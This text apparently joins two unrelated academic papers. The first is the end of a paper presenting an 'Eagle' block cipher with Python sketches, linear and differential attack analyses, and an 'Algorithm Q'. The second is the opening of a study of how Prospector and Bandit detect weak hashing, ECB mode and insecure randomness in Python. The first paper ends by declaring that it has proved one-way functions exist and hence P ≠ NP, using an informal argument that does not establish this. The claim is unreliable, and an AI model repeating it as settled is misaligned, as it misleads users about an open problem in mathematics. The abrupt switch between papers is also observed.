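    return y if (y ^ rotl1(y, width)) == target else None


def encode(block: int, w: tuple[int, int], state: int, width: int):
    """Encode one group; returns (final_state, c)."""
    c = 0
    for k in reversed(range(width)):
        c = (c << 1) | (state & 1)          # assumed: bit of the pre-step state
        state = w[(block >> k) & 1] ^ state ^ rotl1(state, width)
    return state, c


def decode(c: int, w: tuple[int, int], state: int, width: int):
    """Decode one group; returns (initial_state, block)."""
    block = 0
    for k in range(width):                  # undo the steps last to first
        for x in (0, 1):
            previous = solve(state ^ w[x], (c >> k) & 1, width)
            if previous is not None:
                block |= x << k
                state = previous
                break
    return state, block


def encrypt(blocks: list[int], w: tuple[int, int], width: int):
    state = secrets.randbits(width)                      # random S_0
    padded = list(blocks) + [secrets.randbits(width)]    # random group M_{T+1}
    cipher = []
    for block in padded:
        state, c = encode(block, w, state, width)
        state ^= c                                       # reset S_i = S_i xor C_i
        cipher.append(c)
    return cipher, state


def decrypt(cipher: list[int], final_state: int, w: tuple[int, int], width: int):
    state, blocks = final_state, []
    for c in reversed(cipher):
        state ^= c                                       # undo the reset
        state, block = decode(c, w, state, width)
        blocks.append(block)
    blocks.reverse()
    return blocks[:-1]                                   # drop the random group
```

Encrypting the same groups twice generally yields different ciphertexts because $S_0$ and the extra group are random, while `decrypt` returns the original groups each time.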
In addition, an L-bit plaintext is encoded or decoded bit by bit during encryption or decryption, and the encoding or decoding of each bit is a deterministic and direct calculation, so the encryption and decryption processes have computational complexity O(L).
4 Linear Attack Analysis to Eagle Encryption Algorithm
The linear attack is a very effective attack method against the DES algorithm, proposed by M. Matsui [2] at the European Cryptographic Conference in 1993. Later, scholars quickly discovered that linear attacks are applicable to almost all block encryption algorithms, and linear attacks have become the main attacks on block encryption algorithms. Various new attacks based on linear attacks are constantly being proposed. The core idea of the linear attack is to take a linear approximation of the nonlinear transformation in the cryptographic algorithm, such as the S-box, extend it to a linear approximation of the round function, and then connect these linear approximations to obtain a linear approximation of the entire cryptographic algorithm. Finally, a large number of known plaintext-ciphertext pairs encrypted with the same key are used to recover, by exhaustive search, the plaintext and even the key. We note that linear attacks are effective against block encryption algorithms because, when the key is known, there is a certain implicit linear relationship between the ciphertext and the plaintext. By analyzing the known plaintext-ciphertext pairs, some effective linear relations can be obtained, and some bits of the key can be guessed. In the Eagle encryption process, for a certain group, suppose that the initial state at the beginning of the group is $S_{i-1}$, the plaintext of the group is $M_i$, and the keys are $w_0$ and $w_1$. After [E1]-[E5], we obtain the new state $S_i$ and the encoding result $C_i$. Only $C_i$ is included in the ciphertext; $S_i$ is not included in the ciphertext, that is, $S_i$ is invisible to the decryption party and thus invisible to the attacker.
At the beginning of each group, $S_{i-1}$ can be regarded as completely random. This is because, starting from the first group, $S_0$ is completely random; after the encoding process for the first group, $C_1$ is completely random, and the state $S_1 \oplus C_1$ of the second group is also completely random. By analogy, the initial state $S_{i-1}$ at the beginning of each group is completely random, and the ciphertext $C_i$ of the group is completely random. That is to say, for a certain key and plaintext, the ciphertext is completely random and has no mathematical relationship with the plaintext or the key. For an attacker who knows a pair of plaintext $M_i$ and ciphertext $C_i$ of any group, a corresponding encryption or decryption can be found for any key in the key space that meets the conditions. For example, if an attacker chooses a specific key $w_0$ and $w_1$, he can choose $S_{i-1}$ randomly and then use the key, $S_{i-1}$, and $M_i$ to execute the encoding process [E1]-[E5] to get the state $S_i$. According to Theorem 2, the arbitrariness of the attacker’s choice of $S_{i-1}$ does not affect the certainty of $S_i$. Then he can execute the decoding process [D1]-[D5] on $S_i$ and $C_i$ to get $S_{i-1}$. This means that for any key he can find a suitable $S_{i-1}$ that satisfies the condition for a known plaintext-ciphertext pair $(M_i, C_i)$, and the attacker cannot get any valid information from the pair, which can be written as
$\Pr(W = (w_0, w_1) \mid M = m_i, C = c_i) = 1/2^{2L-1}$.
This can also be summarized as the following theorem:
[Theorem 3]. For any L-bit $M_1$ and $C_1$, and for any $(2L-1)$-bit key $K = (w_0, w_1)$, there must be unique $S_0$ and $S_1$ such that $\xi_{w_0,w_1}: (S_0, M_1) \Rightarrow (S_1, C_1)$ holds.
The independence of the plaintext-ciphertext pair from the key makes it impossible for any linear attacker to establish an effective relationship.
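The statement of Theorem 3 can be explored by brute force for a small power-of-two length. The sketch below is an illustration under a labeled assumption: each ciphertext bit records the last (least significant) bit of the state before the corresponding encoding step, which may differ from the indexing printed in E4. For a fixed key and plaintext group, it collects the ciphertexts produced by all initial states; if every L-bit ciphertext appears exactly once, each pair (M, C) corresponds to exactly one initial state. The function names are hypothetical.

```python
def rotl1(value: int, width: int) -> int:
    return ((value << 1) | (value >> (width - 1))) & ((1 << width) - 1)


def encode(block: int, w: tuple[int, int], state: int, width: int):
    """Encode one group (most significant bit first); returns (c, final_state)."""
    c = 0
    for k in reversed(range(width)):
        c = (c << 1) | (state & 1)          # assumed: bit of the pre-step state
        state = w[(block >> k) & 1] ^ state ^ rotl1(state, width)
    return c, state


def ciphertexts(block: int, w: tuple[int, int], width: int) -> set[int]:
    """All ciphertext groups reachable from the 2**width initial states."""
    return {encode(block, w, s0, width)[0] for s0 in range(1 << width)}
```

For L = 4 the set returned by `ciphertexts` contains all 16 possible values for every valid key and every plaintext group, so under the stated assumption each ciphertext is reached from exactly one initial state.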
5 Differential Attack Analysis to Eagle Encryption Algorithm
The differential attack was proposed by Biham and Shamir [6] in 1990; it is a chosen-plaintext attack. Its core idea is to obtain key information by analyzing specific plaintext and ciphertext differences. The essence of a differential attack is to track the “difference” of a plaintext pair, where the “difference” is defined by the attacker according to the target and can be an XOR operation or some other measure. For example, if the attacker chooses the plaintext M and the difference $\delta$, the other plaintext is $M + \delta$. The attacker mainly searches for possible keys by analyzing the difference between the ciphertexts $C$ and $C + \varepsilon$. For the Eagle encryption algorithm, suppose the differential attacker chooses two specific plaintexts $M_1$ and $M_2$ with difference $\delta$, that is, $M_2 = M_1 + \delta$; the corresponding ciphertexts are $C_1$ and $C_2$, and the difference between the ciphertexts is $\varepsilon$, that is, $C_2 = C_1 + \varepsilon$. Since $C_1$ and $C_2$ are completely random in the encryption process of the Eagle algorithm, it is completely uncertain whether the ciphertext difference $\varepsilon$ is caused by randomness or by the propagation of the plaintext difference. Furthermore, $E_{w_0,w_1}(M_1)$ and $E_{w_0,w_1}(M_2)$ follow the same probability distribution, which can be written as
$\Pr(C_1 = c_1, C_2 = c_2 \mid M_1 = m_1, M_2 = m_2) = 1/2^{2L}$.
That is to say, for any specific plaintexts $M_1$ and $M_2$ selected by the attacker and encrypted with the same key, the corresponding block ciphertexts $C_1$ and $C_2$ are completely random, and every possible value in the ciphertext space appears with equal probability. The attacker has no way to capture the propagation characteristics of the “difference” in the plaintext.
6 One-Way Function Design
6.1 Introduction to One-Way Functions
Before constructing the one-way function, we briefly introduce the properties of one-way functions and their relationship with the P != NP problem.
[Definition 1]. A function f is a one-way function if it satisfies the following properties:
a) For a given x, there exists a polynomial-time algorithm that outputs f(x).
b) Given y, it is difficult to find an x that satisfies y = f(x); that is, there does not exist a polynomial-time algorithm that finds such an x.
NP refers to the set of problems whose solutions are verifiable by a polynomial-time algorithm. Whether every problem in NP also has an algorithm that solves it in polynomial time is the P vs NP problem. If P != NP, then for some NP problems there is no algorithm that solves them in polynomial time. If P = NP, then for all NP problems there exist algorithms that solve them in polynomial time. If a one-way function exists, it means that there exists an NP problem that has no deterministic polynomial-time algorithm, that is, P != NP. This is a direct inference, which can be stated as the following theorem; see [9] for details.
[Theorem 4]. If a one-way function exists, then P != NP.
We then introduce an additional simple algorithmic problem, which we describe as the following theorem.
[Theorem 5]. For two sets selected completely independently, with $l_1$ and $l_2$ elements respectively, the average complexity of finding the common element of the two sets (there may be at most one common element) is at least $c \cdot \min(O(l_1), O(l_2))$, where c is a certain constant. This is because, before a common element is found, each of the remaining unvisited elements in the two sets will be visited at least once with equal probability.
6.2 Construction of One-Way Functions
Let us go back to the Eagle encryption algorithm described in Chapter 3. Assume that the key is $K = (w_0, w_1)$ with length $2L - 1$ bits, that the plaintext has n blocks, denoted $M = (M_1, M_2, \ldots, M_n)$, where each block has length L bits, and that the encrypted ciphertext is $C = (C_1, C_2, \ldots, C_{n+1}, S_{n+1})$. The plaintext-ciphertext pair of the i-th group ($1 \le i \le n$) is $M_i$-$C_i$, and for group $n+1$ only the ciphertext $(C_{n+1}, S_{n+1})$ is known. It is not difficult to see that, since the last group has only ciphertext, any key is “right”. For the i-th group ($1 \le i \le n$), we may take the first group without loss of generality.
Given the plaintext $M_1$ and the ciphertext $C_1$, by Theorem 3 any key is also “right”, so we can only “guess” the key from each group independently. The plaintext-ciphertext pairs of two non-consecutive groups can also be regarded as completely independent; for example, the plaintext or ciphertext of the $i$-th group has no relationship with that of the $(i+2)$-th group. For two consecutive groups, the only connection between $M_i$-$C_i$ and $M_{i+1}$-$C_{i+1}$ is that the initial state of the $(i+1)$-th group equals $S_i \oplus C_i$. In fact, we can easily cut off the connection between the $i$-th group and the $(i+1)$-th group, for example by changing the initial state of the $(i+1)$-th group to $S_i \oplus Y = S_{i+1}$, where $Y$ is a random number that does not depend on any system variable, and then putting $Y$ into an additional group to be encrypted. Then, when the plaintext-ciphertext pairs of any number of groups are known, the process of “guessing” the key is independent for every group; and because within each group any key is “right”, the only way to “guess” the key is trial and error. Since the key has $2L - 1$ bits, there are $2^{2L-1}$ possible keys in the entire key space. Obviously, the computational complexity of the trial-and-error method is exponential. The above analysis is the core idea behind our construction of a one-way function, and we now define the following encryption algorithm:
G. Ming
[Encryption Algorithm Q] For a $(2L-1)$-bit key $K = (w_0, w_1)$ and two blocks of plaintext $M = (M_1, M_2)$, the encryption process is as follows:

[Q1] Generate $p$ $L$-bit random numbers completely independently, denoted as $X = (X_1, X_2, \ldots, X_p)$, where $p > 1$.

[Q2] Select three functions $f_1 : x \to y_1$, $f_2 : x \to y_2$, $f_3 : x \to y_3$, where $x$ is the set of $pL$-bit binary data and $y_1, y_2, y_3$ are sets of $L$-bit binary data. Calculate $Y_1 = f_1(X)$, $Y_2 = f_2(X)$, $Y_3 = f_3(X)$. Note that $f_1, f_2, f_3$ are chosen to have polynomial-time complexity.

[Q3] Random numbers $S_0$ and $M_3$ are selected completely independently, and the following algorithm is executed:

$$
\begin{aligned}
\xi_{Y_2,Y_3} &: (S_0, M_1) \Rightarrow (S_1, C_1) \\
\xi_{Y_2,Y_3} &: (S_1 \oplus Y_1, M_2) \Rightarrow (S_2, C_2) \\
\xi_{Y_2,Y_3} &: (S_2, M_3) \Rightarrow (S_3, C_3)
\end{aligned}
$$

Output $(C_1, C_2, C_3, S_3)$ as the first part of the ciphertext.

[Q4] Use the Eagle encryption algorithm introduced in Chapter 3 to encrypt $X = (X_1, X_2, \ldots, X_p)$ and obtain the second part of the ciphertext $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$.

Obviously, algorithm Q is correct, because from the ciphertext $(C_1, C_2, C_3, S_3)$ and $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$ the plaintext $(M_1, M_2)$ can be completely decrypted. First use the Eagle encryption algorithm introduced in Chapter 3 to decrypt $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$ and get $X = (X_1, X_2, \ldots, X_p)$, compute $Y_1 = f_1(X)$, $Y_2 = f_2(X)$, $Y_3 = f_3(X)$, and then execute the following algorithm, where $S_1^{*} = S_1 \oplus Y_1$:

$$
\begin{aligned}
\xi_{Y_2,Y_3} &: (S_3, C_3) \Rightarrow (S_2, M_3) \\
\xi_{Y_2,Y_3} &: (S_2, C_2) \Rightarrow (S_1^{*}, M_2) \\
\xi_{Y_2,Y_3} &: (S_1^{*} \oplus Y_1, C_1) \Rightarrow (S_0, M_1)
\end{aligned}
$$

Output the complete plaintext $(M_1, M_2)$.

The question we are going to ask is: in algorithm Q, if we know the plaintext $(M_1, M_2)$, how much does this help us to “guess” the key $K = (w_0, w_1)$? We divide algorithm Q into two parts: [Q1]-[Q2] are the parameter preparation stages, [Q3] is the first part of the algorithm, and [Q4] is the second part of the algorithm. Obviously these two parts are completely independent. The only connection is $Y_1 = f_1(X)$, $Y_2 = f_2(X)$, $Y_3 = f_3(X)$. Since $f_1, f_2, f_3$ can be regarded as compression functions, unique $Y_1, Y_2, Y_3$ are obtained for any $X$; conversely, for given $Y_1, Y_2, Y_3$ there are $2^{(p-3)L-1}$ values of $X$ satisfying $Y_1 = f_1(X)$, $Y_2 = f_2(X)$, $Y_3 = f_3(X)$.
From the decryption process, we can see that for a specified key $K = (w_0, w_1)$ a unique $X$ is obtained, so that $Y_1, Y_2, Y_3$ are uniquely determined. But without knowing the key $K = (w_0, w_1)$, even the verification of $Y_1$ becomes a very “complex” problem. This is because, for the plaintext-ciphertext pair in the first part, for any $Y_1$ there are at least $2^{L-1}$ possible $Y_2, Y_3$ that are “right”. For the ciphertext of the second part, when only $Y_1$ is known, and even if $Y_2, Y_3$ are known as well, there are at least $2^{(p-3)L-1}$ possible $X$ that are “right”. So the problem of verifying $Y_1$ becomes an exponential-time problem. Therefore, it can be directly proved that the problem of “guessing” the key satisfies the property of a one-way function. See the following theorem and proof for details.

[Theorem 6]. For a $(2L-1)$-bit key $K = (w_0, w_1)$ and two blocks of plaintext $M = (M_1, M_2)$, let the ciphertext obtained with encryption algorithm Q be $(C_1, C_2, C_3, S_3)$ and $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$. Then, under the condition that the plaintext $M = (M_1, M_2)$ is known, the problem of verifying $Y_1$ generated in [Q2] has no polynomial-time algorithm.

Proof: Observe that in encryption algorithm Q there are five independent variables $K, X, Y_1, Y_2, Y_3$; [Q2] and [Q3] can be expressed as $F_1(X, Y_1, Y_2, Y_3) = 0$, and [Q4] as $F_2(K, X) = 0$. Without knowing $K$ and $X$, the problem of verifying $Y_1 = y_1$ is equivalent to the problem of finding $X$ that satisfies $F_1(X, Y_1, Y_2, Y_3) = 0$ and $F_2(K, X) = 0$. For the part [Q3], given $M = (M_1, M_2)$ and $(C_1, C_2, C_3, S_3)$, consider the following calculation process:

$$
\begin{aligned}
\xi_{Y_2,Y_3} &: (S_0, M_1) \Rightarrow (S_1, C_1) \\
\xi_{Y_2,Y_3} &: (S_1 \oplus Y_1, M_2) \Rightarrow (S_2, C_2)
\end{aligned}
$$

With $C_1, C_2, M_2$ fixed, for any combination of $(Y_2, Y_3, Y_1)$ a unique $(S_0, M_1, S_2)$ can be derived. By a simple combinatorial argument, it is not difficult to conclude that for any $y_1 \in Y_1$ there are at least $2^{L-1}$ possible $y_2 \in Y_2$, $y_3 \in Y_3$ that satisfy the condition.
Therefore, with any algorithm, to verify $y_1 \in Y_1$ it is necessary to check each of the $2^{(p-2)L-1}$ possible values of $X$. For the part [Q4], given that $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$ is known, since $K$ is unknown there are $2^{2L-1}$ possible $X$. Since the process [Q4] is independent of [Q2] and [Q3], by Theorem 5 the problem of finding $X$ has exponential complexity.

[Theorem 7]. For a $(2L-1)$-bit key $K = (w_0, w_1)$ and two blocks of plaintext $M = (M_1, M_2)$, let the ciphertext obtained with encryption algorithm Q be $(C_1, C_2, C_3, S_3)$ and $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$. Then, under the condition that the plaintext $M = (M_1, M_2)$ is known, the process of finding the key $K = (w_0, w_1)$ satisfies the properties of a one-way function.
Proof: First, for any key $K = (w_0, w_1)$, to determine whether it is correct, one only needs to use $K$ to decrypt the ciphertext and then check whether the obtained plaintext is $M$. Obviously, the computational complexity is $O(L)$, which satisfies condition 7.1.1. Next, we need to prove condition 7.1.2, that is, that there is no polynomial-time algorithm for the problem of “guessing” the key. Here we use proof by contradiction. Assume that there is a polynomial-time algorithm for the problem of “guessing the key”. After the algorithm is executed, the ciphertexts $(C_1, C_2, C_3, S_3)$ and $(C_1, C_2, \ldots, C_p, C_{p+1}, S_{p+1})$ are decrypted to obtain $X$. The decryption only requires complexity $O(L)$. According to the assumption in [Q2], the calculation of $Y_1 = f_1(X)$ also has polynomial-time complexity. This whole series of calculations therefore has polynomial-time complexity, which contradicts the conclusion of Theorem 6. Therefore, the problem of “guessing” the key satisfies the properties of one-way functions.

According to Theorem 7, we have found a problem that satisfies the properties of one-way functions, which proves the existence of one-way functions. According to Theorem 4, we have also directly proved P ≠ NP.

Finally, we briefly introduce the selection of the functions $f_i$ ($i = 1, 2, 3$) in [Q2]. The proof requires that $f_i$ satisfy the condition that, for any $Y_i$, there are exponentially many possible $X$ satisfying $Y_i = f_i(X)$. This is actually very easy to do. For example, if we choose $p = L$, taking the $i$-th bit of each of the numbers $X_1, X_2, \ldots, X_L$ satisfies the condition.
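The example choice of $f_i$ at the end of this section can be checked by brute force for a very small $L$. The following is a minimal sketch, not the author's implementation: the function names `f_i` and `count_preimages` are hypothetical, and the bit numbering (zero-based, counted from the least significant bit) is an assumption, since the text does not fix a convention.

```python
from itertools import product


def f_i(X, i):
    """Hypothetical f_i: concatenate bit i of each L-bit number in X.

    Bit positions are zero-based from the least significant bit (assumption).
    With p = L numbers in X, the result is an L-bit value.
    """
    y = 0
    for x in X:
        y = (y << 1) | ((x >> i) & 1)
    return y


def count_preimages(L, i, target):
    """Count all X = (X_1, ..., X_L) of L-bit numbers with f_i(X) == target."""
    return sum(
        1 for X in product(range(2 ** L), repeat=L) if f_i(X, i) == target
    )


L = 3  # tiny block length so that exhaustive enumeration is feasible
counts = {y: count_preimages(L, 0, y) for y in range(2 ** L)}
print(counts)
```

For this particular choice, each output value fixes one bit in every $X_j$ and leaves the other $L - 1$ bits free, so every $Y_i$ has $2^{L(L-1)}$ preimages, which grows exponentially in $L$ as the condition requires.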
7 Conclusion

This paper first constructed a block encryption algorithm for which, given any known plaintext-ciphertext pair, any key in the key space satisfies the condition; that is, for any plaintext, encryption with the same key can yield any specified ciphertext. Using this property, the paper then constructed another encryption algorithm, Q. With algorithm Q, when the key is known, decryption can be completed in time polynomial in $L$. When arbitrary plaintext-ciphertext pairs are known, the problem of “guessing the key” is equivalent to the problem of “verifying some unknown intermediate parameter”, which is in turn equivalent to “finding the common element of two independently selected sets of at least $2^L$ elements each”. This obviously has time complexity exponential in $L$, which proves that the problem of “guessing the key” satisfies the property of a one-way function. Since the existence of a one-way function implies P ≠ NP, this proves that P ≠ NP.
References

1. Shannon, C.E.: Communication theory of secrecy systems. Bell Syst. Tech. J. 28(4), 656–715 (1949)
2. Matsui, M.: Linear cryptanalysis method for DES cipher. In: Advances in Cryptology: EUROCRYPT ’93. LNCS, vol. 765, pp. 386–397. Springer (1993). https://doi.org/10.1007/3-540-48285-7_33
3. Kaliski, B.S., Robshaw, M.J.B.: Linear Cryptanalysis Using Multiple Approximations. In: Annual International Cryptology Conference. Springer, Berlin, Heidelberg (1994)
4. Biryukov, A., De Cannière, C., Quisquater, M.: On Multiple Linear Approximations. In: Franklin, M. (ed.) CRYPTO 2004. LNCS, vol. 3152, pp. 1–22. Springer, Heidelberg (2004). https://doi.org/10.1007/978-3-540-28628-8_1
5. Cho, J.Y., Hermelin, M., Nyberg, K.: A New Technique for Multidimensional Linear Cryptanalysis with Applications on Reduced Round Serpent. In: Lee, P.J., Cheon, J.H. (eds.) ICISC 2008. LNCS, vol. 5461, pp. 383–398. Springer, Heidelberg (2009). https://doi.org/10.1007/978-3-642-00730-9_24
6. Biham, E., Shamir, A.: Differential Cryptanalysis of the Data Encryption Standard. Springer-Verlag (1993)
7. Biham, E., Biryukov, A., Shamir, A.: Cryptanalysis of Skipjack Reduced to 31 Rounds Using Impossible Differentials. In: Stern, J. (ed.) EUROCRYPT 1999. LNCS, vol. 1592, pp. 12–23. Springer, Heidelberg (1999). https://doi.org/10.1007/3-540-48910-X_2
8. Tsunoo, Y., Tsujihara, E., Shigeri, M., et al.: Cryptanalysis of CLEFIA using multiple impossible differentials. In: 2008 International Symposium on Information Theory and Its Applications, ISITA 2008. IEEE, pp. 1–6 (2008)
9. Arora, S., Barak, B.: Computational Complexity: A Modern Approach (2009)
Python Cryptographic Secure Scripting Concerns: A Study of Three Vulnerabilities

Grace LaMalva1, Suzanna Schmeelk1(B), and Dristi Dinesh2

1 St. John’s University, Queens, NY 11439, USA
2 University of Southern California, Los Angeles, CA 90089, USA
Abstract. The maintenance and protection of data has never been more important than in our modern technological landscape. Cryptography remains a key method for lowering risks to the confidentiality and integrity of data. This paper examines secure scripting topics within cryptography, namely insecure hashing methods, insecure block cipher implementation, and pseudo-random number generation, through the lens of open-source Python scripts. Our research examines the reports produced for these open-source projects by two popular static analysis tools, Prospector and Bandit, to identify vulnerable scripting usages and patterns. Our analysis includes a comparison of the tool findings with data collected through manual review. Our findings show that, despite the many capabilities and features of common Python static analysis tools, detection of insecure use of cryptography is rare. Prospector detected none (0%) of the three identified cryptographic vulnerability cases, compared to 66% detection by Bandit. In addition, manual code review remains necessary for security-related issues that static analysis tools cannot detect, as revealed by the presence of false negatives in this study.

Keywords: Python software development · Static analysis · Cybersecurity · Secure scripting · Cryptography
1 Introduction

Static analysis is a method of analyzing code without program execution [1]. Techniques can be employed on any software (e.g. source, byte, machine) at any point in the software lifecycle (e.g. during development time weakness identification, reverse engineering deployed software for malware fingerprints) [2]. Static analysis can also be paired with dynamic analysis. Analysis can identify true or false positives for coding paradigms under review [3]. Mitigating true positive coding issues such as errors, security vulnerabilities, and performance issues can improve scripts and software. Ideal static analysis tools can address aspects of software including configuration; security weaknesses; space, time, battery concerns; extensibility; and other deterministic heuristics [4]. Identifying programming errors and underlying security issues (e.g., cryptography usages) early in development can optimize efficiency, accuracy, and consumer data security.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 602–613, 2023. https://doi.org/10.1007/978-3-031-28073-3_42
Python is a high-level programming language that has seldom benefited from static analysis. While there is considerable experience with programming languages that have static type systems, especially C, C++, and Java, languages with dynamic behavior such as Python require different approaches [5]. Such dynamic behavior can be an obstacle when validating software systems written in Python [6], which may be one reason why there is little prior research in the field. Python is accessible for scripting and application development, among other use cases [7], and offers extensive supporting libraries, integration, and productivity adoptions. The fact that the complexity of industrial software generally grows faster than its authors’ ability to manage that complexity is one of the central challenges facing software engineering and computer science as disciplines [8].

The research contribution of this paper fills a literature gap in detecting cryptographic concerns with Python static analysis. This paper is a case study of three types of cryptographic vulnerabilities, although the static analysis tools also identified security vulnerabilities that are irrelevant (i.e., non-cryptographic) to this research. The paper first introduces the importance of static analysis and describes its significance within the scope of Python. It then describes the specific problem and its significance for security. Next, it gives a high-level overview of the two analysis tools in question. We then describe our methodology for collecting data and present our findings. Finally, we discuss possible future work and conclude with our results.
2 Problem and Significance

Secure Scripting Concerns Specific to Python

In the development of a Python program, implementing secure scripting techniques is crucial for mitigating vulnerabilities and risks within the code [9]. Despite Python’s aforementioned versatility, some secure scripting concerns can affect program quality and security. Python users often assume that the code to be executed is not malicious. However, current versions of Python lack mechanisms to enforce a security policy that prevents code from accessing resources such as files or sockets [4]. Although Python also lacks built-in support for input validation, there are efforts to implement a taint mode in Python, which can detect injection vulnerability patterns [4]. Injection vulnerabilities expose a program to malicious code through system commands or “improper sanitization” of inputs, and can also affect file accessibility through invalid file paths (directory traversal). Outdated dependencies also pose a security concern, since they can make the code more susceptible to malware. Static analysis offers tools that provide practical support during program development.

Necessity for Maintaining Confidentiality and Integrity via Cryptography

Cryptography is the primary tool for protecting information [10]. Cryptography can be defined as techniques that cipher data, depending on specific algorithms that make the data unreadable to the human eye unless decrypted by algorithms that are predefined by
the sender [11]. Cryptography not only protects data from theft or alteration, but can also be used for user authentication [12]. Cryptography preserves the confidentiality, integrity, and availability of data, making it a necessary front in any cybersecurity infrastructure. Ordinary developers usually lack knowledge of practical cryptography, and support from specialists is rare. Frequently, these difficulties are addressed by running static analysis tools to automatically detect cryptography misuse during coding and reviews. However, the effectiveness of such tools is not yet well understood [3]. Continuous testing and analysis for cryptography-related security threats throughout the development lifecycle can positively impact the results of a project. Prior research shows that the coverage of public-key cryptography by static code analysis tools is full of blind spots, because tools prioritize only those misuses related to the most frequent coding tasks and use cases, while neglecting infrequent use cases [13]. Cryptography must be acknowledged as a secure scripting concern in order to provide a comprehensive overview of application security.

The issues outlined in this research are insecure hashing, insecure block cipher modes, and pseudorandomness. Cryptographic hashing algorithms are one-way functions; under no circumstance should there be an inverse function. With an ideal cryptographic hashing function, reversing the digest back to the message should be infeasible [14]. However, certain cryptographic hash functions, such as Message Digest 5 (MD5) and Secure Hash Algorithm 1 (SHA-1), were published more than two decades ago to secure passwords in the environments in which they were implemented. Since the publication of these algorithms, associated weaknesses and vulnerabilities have been identified. The evolution of cryptography has rendered some previously secure methods of encryption insecure.
For example, in AES encryption, a block mode is used to combine several blocks for encryption and decryption [15]. However, some block modes are considered insecure by experts [16]. The Electronic Code Book (ECB) mode uses simple substitution, making it one of the easiest and fastest modes to implement. The input plaintext is divided into blocks, and each block is encrypted individually using the key. This allows each encrypted block to be decrypted individually, but it also means that encrypting the same block twice returns the same ciphertext twice.

The use of the random package is problematic in Python scripting when performing cryptographic functions. The random module is built on the Mersenne Twister, one of the most extensively tested random number generators in existence. However, being completely deterministic, it is not suitable for all purposes, and is completely unsuitable for cryptographic purposes [20]. Instead, the secrets module is recommended for generating secure random numbers for managing secrets [21].
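The ECB weakness described above, where identical plaintext blocks produce identical ciphertext blocks, can be reproduced with the standard library alone. The following is a minimal sketch under stated assumptions: it does not use AES, but a toy four-round Feistel construction built from HMAC-SHA256 as a stand-in block cipher, so that no third-party package is needed. All function names here are hypothetical, and the toy cipher is for illustration only and must not be used to protect data.

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # bytes; same block size as AES, but this is NOT AES


def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed round function: HMAC-SHA256 truncated to half a block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Four-round Feistel network: a deterministic keyed permutation of one block.
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right


def _blocks(data: bytes):
    if len(data) % BLOCK:
        raise ValueError("input must be a multiple of the block size")
    return [data[i : i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # ECB: every block is encrypted on its own with the same key.
    return b"".join(toy_encrypt_block(key, b) for b in _blocks(plaintext))


def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # CBC-style chaining: each block is XORed with the previous ciphertext block.
    prev = secrets.token_bytes(BLOCK)  # random IV, prepended to the output
    out = [prev]
    for b in _blocks(plaintext):
        prev = toy_encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


key = secrets.token_bytes(16)
message = b"ATTACK AT DAWN!!" * 2  # two identical 16-byte blocks

ecb = _blocks(ecb_encrypt(key, message))
cbc = _blocks(cbc_encrypt(key, message))[1:]  # drop the IV

print("ECB blocks equal:", ecb[0] == ecb[1])
print("CBC blocks equal:", cbc[0] == cbc[1])
```

The ECB output repeats because each block depends only on the key and that block's plaintext, whereas chaining with a random IV makes the two ciphertext blocks differ except with negligible probability. The same comparison would apply to a real AES implementation in ECB mode versus a mode that uses an IV or nonce.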
3 Review of Literature

While there is extensive research on the theory of cryptography, additional research is needed on its usage in enterprise scripting and applications. The incorrect use of cryptography is a common source of critical software vulnerabilities [22]. Previous literature [23], using independently developed open-source static analysis tools, reveals that 52.26% of Python projects have at least one misuse of the crypto libraries; examples are shown in Fig. 1. Schmeelk and Tao [24] analyzed the misuse of
cryptography within Android, while an empirical study examined cryptography usage across Python, Java, and C [25]. Cryptographic API misuse is responsible for a large number of software vulnerabilities. In many cases developers are overburdened by the complex set of programming choices and their security implications [26].
Fig. 1. Crypto misuses in Java and C with an example of a violation in Python [23].
A common complaint about analysis tools in general is the number of false positives they produce and the time spent filtering out which errors are relevant or interesting given the developer’s coding style. This has inspired the development of auto-detection and remediation tools that streamline the false-positive filtering process [27]. However, another perspective that must be considered is false negatives: issues that exist but are not detected. False negatives are vulnerabilities that testing is intended to reveal but that are mistakenly reported as absent. Prior studies by Thung et al. describe many field defects detected by static bug-finding tools, yet a substantial proportion of defects could not be flagged [28]. A false negative can be more detrimental than a false positive: a false positive describes a problem that does not exist, whereas a false negative leaves an existing issue undetected. False negatives are much more dangerous because they lead to a false sense of security [29].

Prospector aims to be usable as a static analysis tool to its maximum capabilities upon initial installation. It provides default profiles, which serve as a base benchmark. Furthermore, the tool is reported to adapt to the libraries that the analyzed codebase uses [30]. While some Python static analysis tools focus on one type of problem, others cover a wide variety of subjects. Static analysis can reveal errors, warnings, code smells, and style problems; however, no single issue can be found by all of these tools. Prospector compiles multiple Python tools into one and ultimately serves as a wrapper for other, smaller static analysis tools. As a dynamic, all-in-one type of static analysis tool, it serves as a valid baseline for comparison with similar tools.

The primary aim of Bandit is to analyze and identify security issues in Python code.
In this research it serves as a specialized static analysis tool that is expected to yield more specific, security-related output [30]. Bandit processes each file, builds an Abstract Syntax Tree (AST), and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning the input files, it generates a report. Bandit was originally developed within the OpenStack Security Project and later moved to PyCQA (Python Code Quality Authority) [31]. The generated report lists the findings from the scanned files by priority, which can indicate the security quality of the code.
